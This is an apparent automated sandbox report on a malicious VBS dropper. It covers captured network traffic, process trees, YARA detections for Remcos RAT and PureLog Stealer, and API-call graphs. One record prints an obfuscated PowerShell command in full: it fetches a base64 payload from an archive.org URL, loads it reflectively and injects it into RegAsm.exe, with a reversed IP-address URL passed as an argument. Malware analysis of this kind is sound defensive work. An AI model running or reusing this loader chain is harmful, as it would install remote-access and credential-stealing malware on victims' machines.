                                                              Oct 2, 2024 05:29:27.676847935 CEST1236INData Raw: 42 41 41 41 38 7a 34 2f 55 32 50 4f 35 44 75 2b 34 6d 50 57 35 7a 42 39 77 66 50 6a 32 6a 67 38 73 4e 50 4b 79 6a 64 38 73 47 50 67 78 7a 57 38 45 46 50 4d 78 6a 4d 38 63 78 4f 71 76 6a 30 37 6f 35 4f 30 74 7a 56 37 45 69 4f 33 72 44 32 34 6f 4c
                                                              Data Ascii: BAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLA
                                                              Oct 2, 2024 05:29:27.676866055 CEST1236INData Raw: 66 6a 34 33 34 39 4e 61 66 6a 31 33 49 39 4e 4f 66 6a 79 33 59 38 4e 43 66 6a 76 33 6f 37 4e 32 65 6a 73 33 34 36 4e 71 65 6a 70 33 49 36 4e 65 65 6a 6d 33 59 35 4e 53 65 6a 6a 33 6f 34 4e 47 65 6a 67 33 34 33 4e 36 64 6a 64 33 49 33 4e 75 64 6a
                                                              Data Ascii: fj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDf
                                                              Oct 2, 2024 05:29:27.681711912 CEST1236INData Raw: 51 70 4e 42 61 6a 4d 32 59 51 4e 6f 57 54 6c 31 6b 55 4e 44 56 6a 49 31 30 52 4e 54 55 44 43 30 34 50 4e 30 54 6a 37 30 67 4f 4e 69 54 44 33 30 6f 4d 4e 41 54 44 75 30 30 4b 4e 6e 53 54 6f 30 6f 49 4e 43 53 54 52 30 30 44 4e 76 51 54 4a 30 59 42
                                                              Data Ascii: QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAI


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1049706207.241.227.2404437484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-02 03:29:21 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                              Host: ia600100.us.archive.org
                                                              Connection: Keep-Alive
                                                              2024-10-02 03:29:22 UTC606INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Wed, 02 Oct 2024 03:29:22 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 2823512
                                                              Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                              Connection: close
                                                              ETag: "66e22cba-2b1558"
                                                              Strict-Transport-Security: max-age=15724800
                                                              Expires: Wed, 02 Oct 2024 09:29:22 GMT
                                                              Cache-Control: max-age=21600
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                              Access-Control-Allow-Credentials: true
                                                              Accept-Ranges: bytes



                                                              Target ID:4
                                                              Start time:23:29:15
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
                                                              Imagebase:0x7ff7d0ad0000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:23:29:16
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                              Imagebase:0x7ff7b2bb0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:23:29:16
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff620390000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:23:29:18
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                                                              Imagebase:0x7ff7b2bb0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1404922826.0000026F3DE40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:23:29:27
                                                              Start date:01/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0xb10000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:high
                                                              Has exited:false

                                                                • Instruction Fuzzy Hash: 9051326284E7C14FD7139B708C625907FB0AF17224B4E05EBC4D5CF0E3E6596A5AD362

                                                                Execution Graph

                                                                Execution Coverage:3.5%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:5.1%
                                                                Total number of Nodes:1270
                                                                Total number of Limit Nodes:56
                                                                execution_graph (interactive graph; node and limit-node counts are given above. In text form only the node labels survive, so the graph is summarised here as the Windows API calls recorded on its nodes, keyed by the address of the function that makes them. Nodes labelled "N API calls" are collapsed subgraphs, for example 40fbee (118 API calls), 412132 (138 API calls), 41a045 (103 API calls) and 41ada8 (104 API calls).)
                                                                • CRT start-up and runtime: 434a8a IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter; 434cb6 IsProcessorFeaturePresent; 434bb8 GetStartupInfoW; 443396 GetModuleHandleW; 44f45d GetEnvironmentStringsW; 44f49f FreeEnvironmentStringsW; 4461e1 and 445bac RtlAllocateHeap; 445909 EnterCriticalSection; 43bf1f and 449d73 LeaveCriticalSection; 449c70 GetStdHandle, GetFileType; 434c99 and 4352fb RaiseException
                                                                • Dynamic import resolution and resources: 41cbe1, 41cc20 and 41cc39 LoadLibraryA, GetProcAddress; 41cc10 GetModuleHandleA, GetProcAddress; 40ea1c GetModuleFileNameW; 41b539 FindResourceA; 41b556 LoadResource, LockResource, SizeofResource; 41c048 and 41c055 GetCurrentProcess; 40dbd4 GetLongPathNameW
                                                                • Registry: 413584, 41353a and 4135e1 RegOpenKeyExA; 4135ae, 41355b and 41360f RegQueryValueExA, RegCloseKey; 413733 RegOpenKeyExA, RegQueryValueExA, RegCloseKey; 413a5e RegOpenKeyExW; 413a7a RegDeleteValueW; 4137aa and 4138b2 RegCreateKeyA; 4137d5 RegSetValueExA, RegCloseKey
                                                                • Process, host and timing: 40d0ae CreateMutexA, GetLastError; 407790 CreateProcessA, CloseHandle, CloseHandle; 40f27b SetProcessDEPPolicy; 41b69e GetComputerNameExW, GetUserNameW; 41b596 GetLocalTime; 40f0dc and 41b3cc StrToIntA; 40f381 DeleteFileW; 40f36f, 414faf and 415b0a Sleep; 415474 and 41bb77 GetTickCount; 404e26 WaitForSingleObject; CreateThread at 40f003, 40f126, 40f17a, 40f1f6, 40f27e, 40f293, 40f2a8, 415aac, 40a224, 40a23f and 40a24b
                                                                • Network: 40489e WSAStartup; 4048c8 connect; 4151c7 WSAGetLastError
                                                                • Keyboard hook and message loop: 40a30c SetWindowsHookExA; 40a328 GetLastError (reached from the SetWindowsHookExA node); 40a36e GetMessageA; 40a380 TranslateMessage, DispatchMessageA
48391 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48393 40b93f 28 API calls 48391->48393 48393->48396 48396->48390 48396->48391 48399 40adbf GetWindowTextW 48396->48399 48415 40add9 48396->48415 48419 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48396->48419 48420 401f86 48396->48420 48424 434801 23 API calls __onexit 48396->48424 48425 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48396->48425 48398 41bb77 GetTickCount 48398->48415 48399->48396 48401 401f09 11 API calls 48401->48415 48402 40af17 48404 401f09 11 API calls 48402->48404 48403 40b927 28 API calls 48403->48415 48404->48390 48405 40ae84 Sleep 48405->48415 48408 402093 28 API calls 48408->48415 48409 409097 28 API calls 48409->48415 48413 403014 28 API calls 48413->48415 48414 406383 28 API calls 48414->48415 48415->48396 48415->48398 48415->48401 48415->48402 48415->48403 48415->48405 48415->48408 48415->48409 48415->48413 48415->48414 48416 41bcef 28 API calls 48415->48416 48417 40a671 12 API calls 48415->48417 48418 401fd8 11 API calls 48415->48418 48426 40907f 28 API calls 48415->48426 48427 40b19f 31 API calls _Yarn 48415->48427 48428 40b9b7 28 API calls 48415->48428 48429 40b783 40 API calls 2 library calls 48415->48429 48430 441ed1 20 API calls 48415->48430 48431 4052fd 28 API calls 48415->48431 48416->48415 48417->48415 48418->48415 48421 401f8e 48420->48421 48422 402252 11 API calls 48421->48422 48423 401f99 48422->48423 48423->48396 48424->48396 48425->48396 48426->48415 48427->48415 48428->48415 48429->48415 48430->48415 48433 40a776 Sleep 48432->48433 48456 40a6b0 48433->48456 48435 40a2c1 48436 40a7b6 CreateDirectoryW 48454 40a788 48436->48454 48437 40a7c7 GetFileAttributesW 48437->48454 48438 40a7de SetFileAttributesW 48438->48454 48439 4020df 11 API calls 48439->48454 48441 40a858 PathFileExistsW 48449 40a863 48441->48449 48441->48454 48442 401e65 22 API calls 
48442->48454 48443 4020df 11 API calls 48443->48449 48444 4020b7 28 API calls 48444->48454 48446 40a961 SetFileAttributesW 48446->48454 48447 401fd8 11 API calls 48447->48454 48448 406e13 28 API calls 48448->48449 48449->48443 48449->48447 48449->48448 48450 401fe2 28 API calls 48449->48450 48452 401fd8 11 API calls 48449->48452 48479 41c516 32 API calls 48449->48479 48450->48449 48451 406e13 28 API calls 48451->48454 48452->48449 48454->48433 48454->48435 48454->48436 48454->48437 48454->48438 48454->48439 48454->48441 48454->48442 48454->48444 48454->48446 48454->48451 48455 401fd8 11 API calls 48454->48455 48469 41c482 48454->48469 48480 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48454->48480 48455->48454 48457 40a75d 48456->48457 48459 40a6c6 48456->48459 48457->48454 48458 40a6e5 CreateFileW 48458->48459 48460 40a6f3 GetFileSize 48458->48460 48459->48458 48461 40a728 CloseHandle 48459->48461 48462 40a73a 48459->48462 48463 40a716 48459->48463 48464 40a71d Sleep 48459->48464 48460->48459 48460->48461 48461->48459 48462->48457 48466 409097 28 API calls 48462->48466 48481 40b117 84 API calls 48463->48481 48464->48461 48467 40a756 48466->48467 48468 40a1b4 123 API calls 48467->48468 48468->48457 48470 41c495 CreateFileW 48469->48470 48472 41c4d2 48470->48472 48473 41c4ce 48470->48473 48474 41c4f2 WriteFile 48472->48474 48475 41c4d9 SetFilePointer 48472->48475 48473->48454 48476 41c505 48474->48476 48477 41c507 CloseHandle 48474->48477 48475->48474 48478 41c4e9 CloseHandle 48475->48478 48476->48477 48477->48473 48478->48473 48479->48449 48480->48454 48481->48464 48484 40322e 48483->48484 48493 403618 48484->48493 48486 40323b 48486->48312 48488 40326e 48487->48488 48489 402252 11 API calls 48488->48489 48490 403288 48489->48490 48491 402336 11 API calls 48490->48491 48492 403031 48491->48492 48492->47849 48494 403626 48493->48494 48495 403644 48494->48495 48496 40362c 48494->48496 48498 40365c 48495->48498 48499 40369e 48495->48499 48504 
4036a6 28 API calls 48496->48504 48502 4027e6 28 API calls 48498->48502 48503 403642 48498->48503 48505 4028a4 22 API calls 48499->48505 48502->48503 48503->48486 48504->48503 48507 404186 48506->48507 48508 402252 11 API calls 48507->48508 48509 404191 48508->48509 48517 4041bc 48509->48517 48512 4042fc 48528 404353 48512->48528 48514 40430a 48515 403262 11 API calls 48514->48515 48516 404319 48515->48516 48516->47857 48518 4041c8 48517->48518 48521 4041d9 48518->48521 48520 40419c 48520->48512 48522 4041e9 48521->48522 48523 404206 48522->48523 48524 4041ef 48522->48524 48525 4027e6 28 API calls 48523->48525 48526 404267 28 API calls 48524->48526 48527 404204 48525->48527 48526->48527 48527->48520 48529 40435f 48528->48529 48532 404371 48529->48532 48531 40436d 48531->48514 48533 40437f 48532->48533 48534 404385 48533->48534 48535 40439e 48533->48535 48598 4034e6 28 API calls 48534->48598 48536 402888 22 API calls 48535->48536 48537 4043a6 48536->48537 48539 404419 48537->48539 48540 4043bf 48537->48540 48599 4028a4 22 API calls 48539->48599 48542 4027e6 28 API calls 48540->48542 48551 40439c 48540->48551 48542->48551 48551->48531 48598->48551 48606 43ab1a 48600->48606 48604 4138f4 48603->48604 48605 4138ca RegSetValueExA RegCloseKey 48603->48605 48604->47873 48605->48604 48609 43aa9b 48606->48609 48608 40170d 48608->47875 48610 43aaaa 48609->48610 48611 43aabe 48609->48611 48615 44062d 20 API calls _free 48610->48615 48614 43aaaf pre_c_initialization __alldvrm 48611->48614 48616 4489d7 11 API calls 2 library calls 48611->48616 48614->48608 48615->48614 48616->48614 48620 41b98a ctype ___scrt_get_show_window_mode 48617->48620 48618 402093 28 API calls 48619 414f84 48618->48619 48619->47882 48620->48618 48621->47899 48623 414f33 48622->48623 48624 414f3d WSASetLastError 48622->48624 48740 414dc1 29 API calls ___std_exception_copy 48623->48740 48624->47927 48626 414f38 48626->48624 48629 404846 socket 48628->48629 48630 404839 48628->48630 48631 404860 CreateEventW 
48629->48631 48632 404842 48629->48632 48741 40489e WSAStartup 48630->48741 48631->47927 48632->47927 48634 40483e 48634->48629 48634->48632 48636 404f65 48635->48636 48637 404fea 48635->48637 48638 404f6e 48636->48638 48639 404fc0 CreateEventA CreateThread 48636->48639 48640 404f7d GetLocalTime 48636->48640 48637->47927 48638->48639 48639->48637 48744 405150 48639->48744 48742 41bc1f 28 API calls 48640->48742 48642 404f91 48743 4052fd 28 API calls 48642->48743 48651 404a1b 48650->48651 48652 4048ee 48650->48652 48653 40497e 48651->48653 48654 404a21 WSAGetLastError 48651->48654 48652->48653 48656 40531e 28 API calls 48652->48656 48676 404923 48652->48676 48653->47927 48654->48653 48655 404a31 48654->48655 48657 404932 48655->48657 48658 404a36 48655->48658 48660 40490f 48656->48660 48663 402093 28 API calls 48657->48663 48759 41cb72 30 API calls 48658->48759 48664 402093 28 API calls 48660->48664 48662 40492b 48662->48657 48666 404941 48662->48666 48667 404a80 48663->48667 48668 40491e 48664->48668 48665 404a40 48760 4052fd 28 API calls 48665->48760 48673 404950 48666->48673 48674 404987 48666->48674 48670 402093 28 API calls 48667->48670 48671 41b580 80 API calls 48668->48671 48675 404a8f 48670->48675 48671->48676 48678 402093 28 API calls 48673->48678 48756 421ad1 54 API calls 48674->48756 48679 41b580 80 API calls 48675->48679 48748 420cf1 27 API calls 48676->48748 48682 40495f 48678->48682 48679->48653 48685 402093 28 API calls 48682->48685 48683 40498f 48686 4049c4 48683->48686 48687 404994 48683->48687 48689 40496e 48685->48689 48758 420e97 28 API calls 48686->48758 48691 402093 28 API calls 48687->48691 48694 41b580 80 API calls 48689->48694 48693 4049a3 48691->48693 48696 402093 28 API calls 48693->48696 48697 404973 48694->48697 48695 4049cc 48698 4049f9 CreateEventW CreateEventW 48695->48698 48700 402093 28 API calls 48695->48700 48699 4049b2 48696->48699 48749 420d31 48697->48749 48698->48653 48701 41b580 80 API calls 48699->48701 48703 4049e2 
48700->48703 48704 4049b7 48701->48704 48705 402093 28 API calls 48703->48705 48757 421143 52 API calls 48704->48757 48707 4049f1 48705->48707 48708 41b580 80 API calls 48707->48708 48709 4049f6 48708->48709 48709->48698 48711 404e40 SetEvent CloseHandle 48710->48711 48712 404e57 closesocket 48710->48712 48713 404ed8 48711->48713 48714 404e64 48712->48714 48713->47927 48715 404e73 48714->48715 48716 404e7a 48714->48716 48763 4050e4 84 API calls 48715->48763 48718 404e8c WaitForSingleObject 48716->48718 48719 404ece SetEvent CloseHandle 48716->48719 48720 420d31 3 API calls 48718->48720 48719->48713 48721 404e9b SetEvent WaitForSingleObject 48720->48721 48722 420d31 3 API calls 48721->48722 48723 404eb3 SetEvent CloseHandle CloseHandle 48722->48723 48723->48719 48724->47927 48725->47927 48727->47927 48728->47927 48729->47927 48730->47955 48731->47955 48732->47955 48733->47955 48734->47955 48735->47955 48736->47955 48737->47955 48738->47955 48739->47955 48740->48626 48741->48634 48742->48642 48747 40515c 102 API calls 48744->48747 48746 405159 48747->48746 48748->48662 48750 41e7a2 48749->48750 48751 420d39 48749->48751 48752 41e7b0 48750->48752 48761 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48750->48761 48751->48653 48762 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48752->48762 48755 41e7b7 48756->48683 48757->48697 48758->48695 48759->48665 48761->48752 48762->48755 48763->48716 48765->47995 48766->48019 48767->48018 48768->48008 48769->48013 48770->48020 48771->48048 48776 40f7fd 48774->48776 48775 413584 3 API calls 48775->48776 48776->48775 48777 40f8a1 48776->48777 48779 40f891 Sleep 48776->48779 48794 40f82f 48776->48794 48780 409097 28 API calls 48777->48780 48778 409097 28 API calls 48778->48794 48779->48776 48783 40f8ac 48780->48783 48782 41bcef 28 API calls 48782->48794 48784 41bcef 28 API calls 48783->48784 48785 40f8b8 48784->48785 48809 41384f 14 API calls 48785->48809 48788 401f09 11 API calls 
48788->48794 48789 40f8cb 48790 401f09 11 API calls 48789->48790 48792 40f8d7 48790->48792 48791 402093 28 API calls 48791->48794 48793 402093 28 API calls 48792->48793 48795 40f8e8 48793->48795 48794->48778 48794->48779 48794->48782 48794->48788 48794->48791 48796 4137aa 14 API calls 48794->48796 48807 40d0d1 112 API calls ___scrt_get_show_window_mode 48794->48807 48808 41384f 14 API calls 48794->48808 48797 4137aa 14 API calls 48795->48797 48796->48794 48798 40f8fb 48797->48798 48810 41288b TerminateProcess WaitForSingleObject 48798->48810 48800 40f903 ExitProcess 48811 412829 62 API calls 48802->48811 48808->48794 48809->48789 48810->48800 48812 42f97e 48813 42f989 48812->48813 48815 42f99d 48813->48815 48816 432f7f 48813->48816 48817 432f8a 48816->48817 48818 432f8e 48816->48818 48817->48815 48820 440f5d 48818->48820 48821 446206 48820->48821 48822 446213 48821->48822 48823 44621e 48821->48823 48825 4461b8 ___crtLCMapStringA 21 API calls 48822->48825 48824 446226 48823->48824 48831 44622f __Getctype 48823->48831 48833 446802 20 API calls _free 48824->48833 48829 44621b 48825->48829 48827 446234 48834 44062d 20 API calls _free 48827->48834 48828 446259 RtlReAllocateHeap 48828->48829 48828->48831 48829->48817 48831->48827 48831->48828 48835 443001 7 API calls 2 library calls 48831->48835 48833->48829 48834->48829 48835->48831 48836 40165e 48837 401666 48836->48837 48838 401669 48836->48838 48839 4016a8 48838->48839 48841 401696 48838->48841 48840 43455e new 22 API calls 48839->48840 48842 40169c 48840->48842 48843 43455e new 22 API calls 48841->48843 48843->48842 48844 426cdc 48849 426d59 send 48844->48849 48850 41e04e 48851 41e063 ctype ___scrt_get_show_window_mode 48850->48851 48852 432f55 21 API calls 48851->48852 48863 41e266 48851->48863 48856 41e213 ___scrt_get_show_window_mode 48852->48856 48854 41e277 48857 41e21a 48854->48857 48865 432f55 48854->48865 48856->48857 48858 432f55 21 API calls 48856->48858 48861 41e240 ___scrt_get_show_window_mode 
48858->48861 48859 41e2b0 ___scrt_get_show_window_mode 48859->48857 48870 4335db 48859->48870 48861->48857 48862 432f55 21 API calls 48861->48862 48862->48863 48863->48857 48864 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 48863->48864 48864->48854 48866 432f63 48865->48866 48867 432f5f 48865->48867 48868 43bda0 _Yarn 21 API calls 48866->48868 48867->48859 48869 432f68 48868->48869 48869->48859 48873 4334fa 48870->48873 48872 4335e3 48872->48857 48874 433513 48873->48874 48878 433509 48873->48878 48875 432f55 21 API calls 48874->48875 48874->48878 48876 433534 48875->48876 48876->48878 48879 4338c8 CryptAcquireContextA 48876->48879 48878->48872 48880 4338e4 48879->48880 48881 4338e9 CryptGenRandom 48879->48881 48880->48878 48881->48880 48882 4338fe CryptReleaseContext 48881->48882 48882->48880 48883 426c6d 48889 426d42 recv 48883->48889

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
• GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
• GetProcAddress.KERNEL32(00000000), ref: 0041CD06
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000), ref: 0041CD17
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
• GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
• GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
